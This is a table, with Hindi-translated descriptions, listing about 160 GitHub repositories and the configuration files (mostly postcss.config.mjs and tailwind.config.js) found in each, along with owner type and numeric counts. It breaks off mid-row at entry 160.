| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | | 1 | Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform | Codechef-VITC-Student-Chapter | संगठन | 6 | 11 | 1 | Client/postcss.config.mjs | | https://github.com/Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform | | 2 | sparktechagency/Vap-shop-Front-End- | sparktechagency | संगठन | 7 | 0 | 1 | postcss.config.mjs | VapeShopMaps – एक B2B सामाजिक और ई-कॉमर्स प्लेटफ़ॉर्म जो उपयोगकर्ताओं, स्टोर, ब्रांड और थोक विक्रेताओं को वास्तविक समय की सामाजिक सुविधाओं और उन्नत SEO अनुकूलन के साथ जोड़ता है। | https://github.com/sparktechagency/Vap-shop-Front-End- | | 3 | MIS-Silekta/silekta-frontend | MIS-Silekta | संगठन | 1 | 3 | 1 | postcss.config.mjs | यह MIS मॉड्यूल के लिए silekta कंपनी का फ्रंटएंड रिपॉजिटरी है। | https://github.com/MIS-Silekta/silekta-frontend | | 4 | UzairOrganization/allTask | UzairOrganization | संगठन | 0 | 2 | 1 | postcss.config.mjs | | https://github.com/UzairOrganization/allTask | | 5 | FSDTeam-SAA/nico41278-frontend | FSDTeam-SAA | संगठन | 0 | 2 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/nico41278-frontend | | 6 | FSDTeam-SAA/cstrat_frontend | FSDTeam-SAA | संगठन | 1 | 1 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/cstrat_frontend | | 7 | SoftySkills/quiz_app | SoftySkills | संगठन | 3 | 0 | 1 | postcss.config.mjs | | https://github.com/SoftySkills/quiz_app | | 8 | dawahanigeria-team/rayyan-server | dawahanigeria-team | संगठन | 3 | 0 | 1 | eslint.config.mjs | Rayyan ऐप सर्वर | https://github.com/dawahanigeria-team/rayyan-server | | 9 | FSDTeam-SAA/sahara_53 | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | Build a Story Time एक AI-संचालित प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अपनी आवाज़ और चेहरे को पात्रों के रूप में उपयोग करके व्यक्तिगत स्टोरीबुक बनाने देता है। यह कहानी कहने को एक जादुई, इंटरैक्टिव और गहरा व्यक्तिगत अनुभव में बदल देता है। | https://github.com/FSDTeam-SAA/sahara_53 | | 10 | FSDTeam-SAA/lowready-frontend | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | https://github.com/FSDTeam-SAA/lowready-frontend | | 11 | Addis-Career/Frontend | Addis-Career | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 12 | etrainermis/mineduc-Form | etrainermis | संगठन | 0 | 1 | 1 | postcss.config.mjs | EAC World Kiswahili Language Day Celebrations Forum | | | 13 | FSDTeam-SAA/brazen-kits | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 14 | FSDTeam-SAA/Igghy-dashboard | FSDTeam-SAA | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 15 | FlowBondTech/danz-miniapps | FlowBondTech | संगठन | 0 | 1 | 2 | danz-main/postcss.config.mjs | daily-danz/postcss.config.mjs | | | | 16 | BrennansWave-com/brennanswave | BrennansWave-com | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 17 | FlowBondTech/danz-web | FlowBondTech | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 18 | QualifyAI/qualify-frontend | QualifyAI | संगठन | 0 | 1 | 1 | postcss.config.mjs | | | | 19 | FSDTeam-SAA/ftfdesignco-backend | FSDTeam-SAA | संगठन | 0 | 1 | 1 | src/router/index.js | | | | 20 | Gamage-Recruiters-406/Rent_a_Car | Gamage-Recruiters-406 | संगठन | 1 | 0 | 1 | frontend/postcss.config.mjs | | | | 21 | Umbrelabs-Projects/Procobiz | Umbrelabs-Projects | संगठन | 1 | 0 | 1 | postcss.config.mjs | | | | 22 | The-Extra-Project/Extra_surface_repo | The-Extra-Project | संगठन | 1 | 0 | 1 | frontend/postcss.config.mjs | Laurent के संस्करण का Extra-surface के लिए तैनाती संस्करण। | | | 23 | Automobile-System/frontend | Automobile-System | संगठन | 1 | 0 | 1 | postcss.config.mjs | | | | 24 | VplayProCrypto/mvp_vercel | VplayProCrypto | संगठन | 1 | 0 | 1 | tailwind.config.js | चरण 1 mvp का रिपॉजिटरी | | | 25 | sparktechagency/nskustoms_custom_game_site-2.0 | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 26 | softvence-omega-future-stack/gameluke-frontend | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 27 | NexumTechnologies/E-Commerce | NexumTechnologies | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 28 | Umbrelabs-Projects/Hostella-superAdmin | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | यह रिपॉजिटरी उन लोगों के लिए है जो एडमिन पंजीकृत करेंगे | | | 29 | FSDTeam-SAA/admin-dashboard-gman | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 30 | sparktechagency/protippz_website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 31 | FlowRMS/flow-connect-frontend-new | FlowRMS | संगठन | 0 | 0 | 1 | postcss.config.mjs | FlowConnect फ्रंटएंड एप्लिकेशन | | | 32 | Anthem-InfoTech-Pvt-Ltd/dashboards | Anthem-InfoTech-Pvt-Ltd | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 33 | WeOwnAiAgents-Hackerhouse/WeOwnAiAgent | WeOwnAiAgents-Hackerhouse | संगठन | 0 | 0 | 1 | postcss.config.mjs | अंतिम ऑर्केस्ट्रेशन एजेंट ऑर्केस्ट्रेशन प्लेटफ़ॉर्म बनाना जो संप्रभु, टोकनॉमिक्स-संचालित और web3 समुदाय के लिए बनाया गया है। ethdenver हैकथॉन के लिए योगदान। | | | 34 | Karigar-App/Karigar | Karigar-App | संगठन | 0 | 0 | 1 | packages/ui/postcss.config.mjs | | | | 35 | sparktechagency/silicon-zisan-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 36 | FSDTeam-SAA/hinkel-Website | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 37 | FSDTeam-SAA/iwmsadvisors | FSDTeam-SAA | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 38 | Umbrelabs-Projects/Hostella-admin | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | Hostella एडमिन प्लेटफ़ॉर्म | | | 39 | Umbrelabs-Projects/Hostella-stu | Umbrelabs-Projects | संगठन | 0 | 0 | 1 | postcss.config.mjs | Hostella छात्र छात्रावास बुकिंग प्लेटफ़ॉर्म | | | 40 | iwb25-412-vertex-prime/apigateway-v1 | iwb25-412-vertex-prime | संगठन | 0 | 0 | 1 | userportal/postcss.config.mjs | उपयोगकर्ता पोर्टल + प्रबंधन परत | कोटा प्रबंधन, नियम प्रवर्तन, API कुंजी सत्यापन। | | | 41 | Cloudrika/cloudrika-web | Cloudrika | संगठन | 0 | 0 | 2 | packages/ui/postcss.config.mjs | apps/email-portal/next.config.mjs | | | | 42 | sparktechagency/consult_dashboard | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 43 | sparktechagency/jonowoods-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 44 | Softvence-Omega-Dev-Ninjas/diaz-jupiter-marine-frontend | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 45 | sparktechagency/profitable-website-v2 | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 46 | musetax/Amus-fe | musetax | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 47 | sparktechagency/faceAi-front-end | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 48 | sparktechagency/any-job-dashboard | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 49 | sparktechagency/anyjob-web | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 50 | softvence-omega-future-stack/lawalx_frontend | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 51 | softvence-omega-future-stack/kilian-rodhe-last- | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 52 | WeOwnNetwork/EthDenver-submission | WeOwnNetwork | संगठन | 0 | 0 | 1 | apps/web/postcss.config.mjs | ऑनचेन एजेंट रजिस्ट्री के साथ #FedArch ऑर्केस्ट्रेशन इंफ्रा क्लाइंट बनाना। ETHDenver 2026 हैकथॉन के लिए सबमिशन | | | 53 | sparktechagency/betopia-website | sparktechagency | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 54 | FlowRMSLabs/flowdemandwebsite | FlowRMSLabs | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 55 | BhavikPatel-dreamz/wove-gift-portal | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 56 | BhavikPatel-dreamz/DynamicDreamz-AIagent-Demos | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 57 | GARAGE-POS/nextjs_test | GARAGE-POS | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 58 | BhavikPatel-dreamz/Homeopathway | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | postcss.config.mjs | Homeopathway | | | 59 | digitalschool-tech/tech-static | digitalschool-tech | संगठन | 0 | 0 | 1 | postcss.config.mjs | | | | 60 | tricodenetwork/lock-up | tricodenetwork | संगठन | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 61 | Sahl-AI/sahl-ai-iframe | Sahl-AI | संगठन | 0 | 0 | 1 | tailwind.config.js | इसमें iframe दृष्टिकोण का परीक्षण करने के लिए डेमो react ऐप शामिल है | | | 62 | dawahanigeria-team/domainping | dawahanigeria-team | संगठन | 0 | 0 | 1 | frontend/tailwind.config.js | | | | 63 | shahid538org/microrealestate | shahid538org | संगठन | 0 | 0 | 1 | webapps/landlord/tailwind.config.js | | | | 64 | orynth-dev/vite-shadcn-template | orynth-dev | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 65 | FlowBondTech/egator | FlowBondTech | संगठन | 0 | 0 | 1 | apps/web/tailwind.config.js | AIeGator - AI-संचालित इवेंट एकत्रीकरण इंजन (ETHDenver via Luma) | | | 66 | sparktechagency/u_tee_hub | sparktechagency | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 67 | Enigma-Incorporated-Ltd/N0DE-Website | Enigma-Incorporated-Ltd | संगठन | 0 | 0 | 2 | tailwind.config.js | src/tailwind.config.js | | | | 68 | FSDTeam-SAA/AMES_Investment_new | FSDTeam-SAA | संगठन | 0 | 0 | 1 | tailwind.config.js | | | | 69 | Frontier-tech-consulting/olas-mcp-application-workflow | Frontier-tech-consulting | संगठन | 0 | 0 | 1 | docs/tailwind.config.js | इसमें Olas इकोसिस्टम के संबंधित UI मॉकअप वर्कफ़्लो शामिल है (उपयोगकर्ताओं को ऑनचेन इंटरैक्शन के लिए MCP एप्लिकेशन चलाने देने के लिए)। | | | 70 | Softvence-Omega-Dev-Ninjas/vic_pec_server_app | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 71 | Softvence-Omega-Dev-Ninjas/jdadzok_server | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 72 | Binary-Mindz/agimtula_server | Binary-Mindz | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 73 | Softvence-Omega-Dev-Ninjas/alvaaro-server | Softvence-Omega-Dev-Ninjas | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 74 | Softvence-Omega-Cyber-Monk/nishant-server | Softvence-Omega-Cyber-Monk | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 75 | softvence-omega-future-stack/huss-be | softvence-omega-future-stack | संगठन | 0 | 0 | 1 | eslint.config.mjs | | | | 76 | BhavikPatel-dreamz/Products-filters-react | BhavikPatel-dreamz | संगठन | 0 | 0 | 1 | src/App.js | | | | 77 | Victorola-coder/tewo | Victorola-coder | उपयोगकर्ता | 9 | 6 | 1 | tailwind.config.js | tewosimi boboyi, ebi n pami | | | 78 | Atik203/Scholar-Flow | Atik203 | उपयोगकर्ता | 4 | 4 | 1 | apps/frontend/postcss.config.mjs | ScholarFlow एक SaaS प्लेटफ़ॉर्म है जो शोधकर्ताओं, छात्रों, प्रोफेसरों और शैक्षणिक टीमों के लिए डिज़ाइन किया गया है ताकि शोध पत्रों को अपलोड, व्यवस्थित, समीक्षा और साझा शोध पुस्तकालय में संग्रह, एनोटेशन, खोज और टीम सहयोग के साथ प्रबंधित किया जा सके। | | | 79 | Kreliannn/Document-Request-System-FRONTEND | Kreliannn | उपयोगकर्ता | 8 | 1 | 1 | postcss.config.mjs | एक वेब-आधारित प्रणाली जो निवासियों को बरंगे हॉल में जाए बिना ऑनलाइन बरंगे दस्तावेज़ों का अनुरोध करने देती है। निवासी अपने अनुरोध की स्थिति को ट्रैक कर सकते हैं, ईमेल सूचनाएं प्राप्त कर सकते हैं, और अनुरोध इतिहास देख सकते हैं। बरंगे प्रशासक अनुरोधों का प्रबंधन कर सकते हैं, स्थितियों को अपडेट कर सकते हैं, और लेन-देन इतिहास को ट्रैक कर सकते हैं। | | | 80 | coderkhalide/Anti-Detect-Browser | coderkhalide | उपयोगकर्ता | 2 | 4 | 1 | src/renderer/tailwind.config.js | | | | 81 | WeerasingheMSC/ASMS_Frontend | WeerasingheMSC | उपयोगकर्ता | 1 | 4 | 1 | asms_frontend/postcss.config.mjs | फुल-स्टैक ऑटोमोबाइल सेवा समय लॉगिंग और अपॉइंटमेंट सिस्टम जो Next.js, TypeScript, TailwindCSS और Ant Design के साथ फ्रंटएंड के लिए बनाया गया है। इसमें ग्राहक और कर्मचारी पोर्टल, रीयल-टाइम सेवा ट्रैकिंग, अपॉइंटमेंट बुकिंग, समय लॉगिंग और कंटेनरीकृत तैनाती शामिल है। | | | 82 | fsdteam8/n_Krypted-frontend | fsdteam8 | उपयोगकर्ता | 0 | 4 | 1 | postcss.config.mjs | | | | 83 | tanushbhootra576/Bionary-Website-Challenge-and-final | tanushbhootra576 | उपयोगकर्ता | 4 | 2 | 1 | bionary_website/tailwind.config.js | | | | 84 | Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND | Kreliannn | उपयोगकर्ता | 7 | 0 | 1 | postcss.config.mjs | एक वेब ऐप जो AI का उपयोग करके PDF फ़ाइलों को Q&A प्रकार के रिव्यूअर में बदलता है। उपयोगकर्ता सहेजने से पहले जनरेट किए गए आउटपुट को अनुकूलित कर सकता है। उपयोगकर्ता उस सहेजे गए AI-जनरेटेड रिव्यूअर का उपयोग करके समीक्षा कर सकता है और अनुकूलन योग्य क्विज़ ले सकता है। | | | 85 | tanushbhootra576/collegeConnect | tanushbhootra576 | उपयोगकर्ता | 5 | 1 | 1 | postcss.config.mjs | | | | 86 | brown2020/ikigaifinder | brown2020 | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | | | | 87 | Kreliannn/commision_portfolio | Kreliannn | उपयोगकर्ता | 6 | 0 | 1 | postcss.config.mjs | | | | 88 | coderkhalide/Trading-Journal | coderkhalide | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | पेशेवर ट्रेडिंग जर्नल विभिन्न प्रणालियों और समय-सीमाओं में आपके ट्रेडिंग प्रदर्शन को ट्रैक, विश्लेषण और सुधारने के लिए। | | | 89 | tanushbhootra576/weather | tanushbhootra576 | उपयोगकर्ता | 4 | 1 | 1 | postcss.config.mjs | हैकथॉन परियोजना | | | 90 | Kreliannn/student-passed-rate-analysis-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 91 | Kreliannn/pharmacy-management-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 92 | Kreliannn/Employee-management-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 93 | Kreliannn/e-commerce-frontend | Kreliannn | उपयोगकर्ता | 5 | 0 | 1 | postcss.config.mjs | | | | 94 | umarabid123/The_INTERNET_OF_AGENTS_HACKATHON | umarabid123 | उपयोगकर्ता | 1 | 2 | 1 | frontend/postcss.config.mjs | | | | 95 | ahmadraza382/FinanceAi | ahmadraza382 | उपयोगकर्ता | 3 | 1 | 1 | tailwind.config.js | Finance Ai कोच | | | 96 | tanushbhootra576/turbo-happiness | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 97 | shaheeer-dev/sketchers | shaheeer-dev | उपयोगकर्ता | 0 | 2 | 1 | postcss.config.mjs | | | | 98 | tanushbhootra576/game | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 99 | tanushbhootra576/GridSaga | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 100 | senulahesara/devkit | senulahesara | उपयोगकर्ता | 2 | 1 | 1 | postcss.config.mjs | आवश्यक उपकरण, ब्लेज़िंग-फास्ट प्रदर्शन, और ऑफ़लाइन-रेडी सुविधाएं - आपके वर्कफ़्लो को सुव्यवस्थित करने और आपको उस पर केंद्रित रखने के लिए बनाई गई हैं जो मायने रखता है: बेहतरीन कोड लिखना। | | | 101 | tanushbhootra576/week3-forms-and-inputs | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 102 | tanushbhootra576/PW-app | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | postcss.config.mjs | | | | 103 | tanushbhootra576/RESTRO | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | tailwind.config.js | | | | 104 | tanushbhootra576/MoodSync | tanushbhootra576 | उपयोगकर्ता | 4 | 0 | 1 | App.js | | | | 105 | Amanbanti/Capstone | Amanbanti | उपयोगकर्ता | 1 | 1 | 1 | frontend/postcss.config.mjs | कैपस्टोन प्रोजेक्ट सॉफ्टवेयर इंजीनियरिंग (SE) और कंप्यूटर साइंस एंड इंजीनियरिंग (CSE) दोनों कार्यक्रमों के छात्रों के लिए एक समापन शैक्षणिक और व्यावहारिक अनुभव है। | | | 106 | ShifaLabs/shifa | ShifaLabs | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | शेफा एक वेब-आधारित टेलीमेडिसिन प्लेटफ़ॉर्म है जो रोगियों को रीयल-टाइम इन-ऐप वीडियो कॉल के माध्यम से सत्यापित डॉक्टरों से परामर्श करने, डिजिटल प्रिस्क्रिप्शन प्राप्त करने और एक सुरक्षित और पेशेवर वातावरण में दूर से अपने स्वास्थ्य सेवा प्रबंधन करने में सक्षम बनाता है। यह एक तैनाती योग्य, उत्पादन-ग्रेड प्रणाली है, न कि डेमो या शैक्षणिक मॉक-अप। | | | 107 | SouravDn-p/mobile-canvas-nextjs | SouravDn-p | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | MobileCanvas एक आधुनिक, फुल-स्टैक ई-कॉमर्स प्लेटफ़ॉर्म है जो गैजेट और मोबाइल उपकरणों की बिक्री पर केंद्रित है। Next.js, Redux Toolkit और MongoDB के साथ निर्मित, यह उपयोगकर्ताओं के लिए एक सुरक्षित, उत्तरदायी और सहज खरीदारी अनुभव और प्रशासकों के लिए शक्तिशाली प्रबंधन उपकरण प्रदान करता है। | | | 108 | RinSanom/IoTWeb | RinSanom | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | | | | 109 | kanchana404/Google-bussiness-api-Get-reviews-and-Reply-reviews | kanchana404 | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | | | | 110 | Salman1205/MailAssist | Salman1205 | उपयोगकर्ता | 1 | 1 | 1 | postcss.config.mjs | AI-संचालित ग्राहक सहायता प्लेटफ़ॉर्म जिसमें Gmail एकीकरण, स्मार्ट टिकटिंग, स्वचालित प्रतिक्रियाएं, Shopify एकीकरण और रीयल-टाइम टीम सहयोग शामिल है | | | 111 | Yassin-Younis/bypass-in-app-browser | Yassin-Younis | उपयोगकर्ता | 3 | 0 | 1 | next.config.mjs | Instagram, Facebook, TikTok और अन्य जैसे सोशल मीडिया ऐप्स से इन-ऐप ब्राउज़र को बायपास करें। जब उपयोगकर्ता आपके सोशल मीडिया विज्ञापनों पर क्लिक करते हैं तो उन्हें उनके मूल ब्राउज़र पर भेजें ताकि जुड़ाव, सटीक ट्रैकिंग और रूपांतरण बढ़ सके। | | | 112 | Lithira-Silva/TrueClaim---ITPM- | Lithira-Silva | उपयोगकर्ता | 2 | 0 | 1 | client/postcss.config.mjs | TrueClaim — SLIIT (वर्ष 3, सेमेस्टर 2) में ITPM परियोजना के रूप में विकसित एक स्मार्ट दावा प्रबंधन प्रणाली। बीमा दावा प्रक्रिया को सटीकता और दक्षता के साथ सुव्यवस्थित और स्वचालित करने के लिए MERN स्टैक के साथ निर्मित। | | | 113 | maaz-bin-hassan/sahoolat-web-new | maaz-bin-hassan | उपयोगकर्ता | 2 | 0 | 1 | postcss.config.mjs | | | | 114 | Pramadu2001/ITPM_MODUS | Pramadu2001 | उपयोगकर्ता | 0 | 1 | 1 | my-app/postcss.config.mjs | 3rd वर्ष 2nd सेमेस्टर सूचना और प्रौद्योगिकी परियोजना प्रबंधन परियोजना जो MODUS लर्निंग प्लेटफ़ॉर्म है | | | 115 | abimtad/upload_file | abimtad | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 116 | anilgoswamistartbitsolutions/travel-platform | anilgoswamistartbitsolutions | उपयोगकर्ता | 0 | 1 | 3 | sites/holidaydeals/postcss.config.mjs | travel_template/package/postcss.config.mjs | travel_template/old/postcss.config.mjs | | | | 117 | AhsanalyOfficial/ahsan_portfolio | AhsanalyOfficial | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 118 | HevenDev/rmw-new-design | HevenDev | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 119 | anilgoswamistartbitsolutions/travel-payload-sites | anilgoswamistartbitsolutions | उपयोगकर्ता | 0 | 1 | 2 | sites/holidaydeals/postcss.config.mjs | sites/luxurytravels/postcss.config.mjs | | | | 120 | dhruvmalik007/solana-colossum-hackathon | dhruvmalik007 | उपयोगकर्ता | 0 | 1 | 2 | apps/web/postcss.config.mjs | packages/ui/postcss.config.mjs | सतत निवेश पोर्टफोलियो के लिए विषयगत निवेश प्लेटफ़ॉर्म के लिए एक भविष्यवाणी बाज़ार बनाना | | | 121 | Tiewasters99/AI_Law_Wizard | Tiewasters99 | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 122 | coderkhalide/scalping-trading-tools | coderkhalide | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | भारित कारकों, व्यक्तिगत कारक ग्रेडिंग, बोनस अंक और अक्षर ग्रेड के साथ अपने ट्रेडिंग प्रविष्टियों को कॉन्फ़िगर करें और ग्रेड करें | | | 123 | monazahmed/Agrismart-project- | monazahmed | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 124 | Gowreesh-VT/SherlockIT | Gowreesh-VT | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 125 | webprogramminghack/b3-practice-30 | webprogramminghack | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 126 | Salman1205/Mail-Assist-CRM | Salman1205 | उपयोगकर्ता | 2 | 0 | 1 | postcss.config.mjs | | | | 127 | AbdulwahidHusein/Shipper-chat | AbdulwahidHusein | उपयोगकर्ता | 2 | 0 | 1 | frontend/postcss.config.mjs | | | | 128 | michelzappy/zappy-scratch-091225 | michelzappy | उपयोगकर्ता | 0 | 1 | 1 | frontend/tailwind.config.js | | | | 129 | Ali-Hamas/Learn_Hub | Ali-Hamas | उपयोगकर्ता | 0 | 1 | 1 | frontend/tailwind.config.js | LearnHub - FastAPI, React, MongoDB, Stripe भुगतान और AI ट्यूटर के साथ मल्टी-इंस्ट्रक्टर लर्निंग प्लेटफ़ॉर्म | | | 130 | VALENSAPP/coin_backend | VALENSAPP | उपयोगकर्ता | 0 | 1 | 1 | eslint.config.mjs | बैकएंड रिपॉजिटरी। | | | 131 | QaisarWaheed/Aluminum-POS | QaisarWaheed | उपयोगकर्ता | 0 | 1 | 1 | eslint.config.mjs | | | | 132 | Abdulbasit219/UPSkaleAI | Abdulbasit219 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | UP SKale AI छात्रों (सीखने वाले) और (कमाने वाले) के लिए ऐप (FYP परियोजना) | | | 133 | Satyam3002/nextauth | Satyam3002 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 134 | ahmadraza382/Hospital-management-system | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 135 | AKDebug-UX/challengePR | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 136 | Ruwanima/ella-south-star-frontend | Ruwanima | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 137 | ahmadraza382/Luxeurs-Shopping-Store | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 138 | ahmadraza382/Portfolio | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 139 | Ayesha-Siddiqui1234/katy-youth-hackathon-2025-dev-post- | Ayesha-Siddiqui1234 | उपयोगकर्ता | 1 | 0 | 1 | frontend/postcss.config.mjs | हमारी टीम ने katy youth hackathon 2025 में भाग लिया और हम एक पूरी तरह कार्यात्मक वेबसाइट बना रहे हैं जिसमें एकीकृत चैटबॉट है जो करियर काउंसलर की तरह होगा जो छात्रों को उनके करियर पथ के लिए मार्गदर्शन करेगा | | | 140 | WimpyvL/Zappy-Health-Dashboard | WimpyvL | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 141 | ifedolapoomoniyi/fleet-robotics | ifedolapoomoniyi | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 142 | muhammad-tahir-sultan/rehman-fyp-nextjs-multivendor | muhammad-tahir-sultan | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 143 | vkrms/wizard | vkrms | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | react मल्टी-स्टेप फॉर्म ट्रेनिंग प्रोजेक्ट | | | 144 | Atik203/VocabPrep | Atik203 | उपयोगकर्ता | 1 | 0 | 1 | frontend/postcss.config.mjs | एक आधुनिक, केंद्रित वेब एप्लिकेशन जो इंटरैक्टिव लर्निंग, अभ्यास सत्र और प्रगति ट्रैकिंग के माध्यम से अंग्रेजी शब्दावली बनाने और मास्टर करने में मदद करता है। | | | 145 | web-ghoul/Portfolio | web-ghoul | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | इसमें मेरी परियोजनाएं, मेरे अनुभव, मेरे प्रमाण पत्र, मेरा संपर्क शामिल है। | | | 146 | AbdulwahidHusein/ai-tools-directory | AbdulwahidHusein | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 147 | AhmadRazaKhokhar1/resturants-app | AhmadRazaKhokhar1 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 148 | ishivamgaur/Ap-news-next-js | ishivamgaur | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | AP News एक Next.js-आधारित समाचार एप्लिकेशन है जो राजनीति, खेल, प्रौद्योगिकी, मनोरंजन और लाइव अपडेट जैसी श्रेणीबद्ध समाचार सामग्री तेज प्रदर्शन, SEO अनुकूलन और सर्वर-साइड रेंडरिंग के साथ प्रदान करता है। | | | 149 | amMubbasher/cleannami.ceenami-old | amMubbasher | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 150 | AbdulwahidHusein/crawler-dashboard | AbdulwahidHusein | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 151 | SouravDn-p/RexAuction | SouravDn-p | उपयोगकर्ता | 1 | 0 | 1 | tailwind.config.js | लाइव बोली लगाने के अनुभवों के लिए बनाया गया एक रीयल-टाइम नीलामी वेब एप्लिकेशन, जिसमें तत्काल अपडेट, स्मार्ट बिडिंग और उपयोगकर्ताओं के बीच रीयल-टाइम संचार जैसी उन्नत सुविधाएं शामिल हैं। | | | 152 | AKDebug-UX/interactive-tv-app | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | tailwind.config.js | | | | 153 | usman-174/VidSpark | usman-174 | उपयोगकर्ता | 1 | 0 | 1 | client/tailwind.config.js | | | | 154 | NatyJoseDie/proyecto-nginx | NatyJoseDie | उपयोगकर्ता | 1 | 0 | 1 | eslint.config.mjs | | | | 155 | AKDebug-UX/DoneWithIt | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | App.js | | | | 156 | dhruvmalik007/forensics-board | dhruvmalik007 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 157 | Rahulkumarhavit/ProStore-Ecommerce | Rahulkumarhavit | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 158 | Bart3kL/shopify-components | Bart3kL | उपयोगकर्ता | 0 | 0 | 1 | polaris-components/postcss.config.mjs | | | | 159 | mjatin-dev/logic-zephyr | mjatin-dev | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 160 | umrasghar/heygen-demo | umrasghar | 